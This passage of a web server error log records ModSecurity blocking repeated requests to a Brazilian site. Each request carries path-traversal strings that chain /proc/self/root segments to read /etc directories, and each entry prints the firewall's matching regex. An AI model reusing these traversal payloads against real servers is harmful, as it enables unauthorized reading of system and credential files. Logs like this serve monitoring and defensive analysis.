"ablk79Y0UrI5A3LftIztnQAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:01.515095 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.243.203:43436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk8dCmCSWTlPouqorXRwAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:03.826609 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.243.203:43448] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk8geiSKl8TjouI-YMrQAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:05.253679 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.243.203:43462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk9QeiSKl8TjouI-YMsQAAA9c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:06.526046 2026] [:error] [pid 17965:tid 140411624429312] [client 74.7.243.203:43466] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk9qt8Nd0UC_OcbVG7DAAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:09.983776 2026] [:error] [pid 18380:tid 140411599251200] [client 74.7.243.203:43474] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk-K4xEDsg_V3ESNY-hQAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:11.346061 2026] [:error] [pid 11293:tid 140411708356352] [client 74.7.243.203:50912] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk-9CmCSWTlPouqorXSQAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:12.527006 2026] [:error] [pid 9155:tid 140411725141760] [client 74.7.243.203:50914] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk_NbI7zhHXcabyMUw0QAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:13.842346 2026] [:error] [pid 9155:tid 140411624429312] [client 74.7.243.203:50930] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk_dbI7zhHXcabyMUw0wAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:15.055577 2026] [:error] [pid 9155:tid 140411683178240] [client 74.7.243.203:50946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablk_9bI7zhHXcabyMUw1QAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:16.431421 2026] [:error] [pid 17965:tid 140411565680384] [client 74.7.243.203:50952] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllAKt8Nd0UC_OcbVG7DwAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:17.631388 2026] [:error] [pid 9155:tid 140411599251200] [client 74.7.243.203:50968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllAdbI7zhHXcabyMUw1gAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:18.711095 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.241.46:51064] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllAgeiSKl8TjouI-YMxgAAA8A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:18.962919 2026] [:error] [pid 9299:tid 140411691570944] [client 74.7.243.203:50974] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllAr-sgTmmJoPuMdyp0gAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:21.465171 2026] [:error] [pid 9155:tid 140411582465792] [client 74.7.243.203:52724] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllBNbI7zhHXcabyMUw2AAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:22.780335 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.243.203:52726] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllBtY0UrI5A3LftIztpQAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:27.878383 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.243.203:52728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllCtCmCSWTlPouqorXTgAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:30.209870 2026] [:error] [pid 17965:tid 140411574073088] [client 74.7.243.203:52740] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllDqt8Nd0UC_OcbVG7EgAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:31.895982 2026] [:error] [pid 9155:tid 140411674785536] [client 74.7.243.203:60660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllD9bI7zhHXcabyMUw7QAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:33.550061 2026] [:error] [pid 9155:tid 140411565680384] [client 74.7.243.203:60676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllEdbI7zhHXcabyMUw7wAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:34.851314 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.203:60678] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllEtY0UrI5A3LftIztrQAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:28:36.159535 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.243.203:60684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllFAeiSKl8TjouI-YMywAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
